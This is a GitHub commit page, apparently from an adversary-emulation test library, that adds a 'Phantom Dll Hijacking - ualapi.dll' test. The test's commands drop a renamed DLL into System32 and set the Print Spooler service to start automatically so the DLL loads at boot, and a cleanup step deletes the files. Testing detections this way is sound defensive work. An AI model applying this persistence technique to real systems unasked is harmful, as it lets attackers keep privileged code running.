Skip to content

Commit

Permalink
Update T1574.001.yaml (#2898)
Browse files Browse the repository at this point in the history
Phantom Dll Hijacking - ualapi.dll

Co-authored-by: Carrie Roberts <[email protected]>
  • Loading branch information
abhijose09 and clr2of8 authored Aug 13, 2024
1 parent fc96766 commit 39ba130
Showing 1 changed file with 20 additions and 0 deletions.
20 changes: 20 additions & 0 deletions atomics/T1574.001/T1574.001.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -42,3 +42,23 @@ atomic_tests:
del %APPDATA%\WinAppXRT.dll
name: command_prompt
elevation_required: true
- name: Phantom Dll Hijacking - ualapi.dll
description: |
Re-starting the Print Spooler service leads to C:\Windows\System32\ualapi.dll being loaded
A malicious ualapi.dll placed in the System32 directory will lead to its execution whenever the system starts
Upon successful execution, amsi.dll will be copied and renamed to ualapi.dll and then ualapi.dll will be copied to system32 folder for loading during system restart.
Print Spooler service is also configured to auto start. Reboot of system is required
supported_platforms:
- windows
executor:
command: |
copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
ren %APPDATA%\amsi.dll ualapi.dll
copy %APPDATA%\ualapi.dll %windir%\System32\ualapi.dll
sc config Spooler start=auto
cleanup_command: |
del %windir%\System32\ualapi.dll
del %APPDATA%\ualapi.dll
name: command_prompt
elevation_required: true

0 comments on commit 39ba130

Please sign in to comment.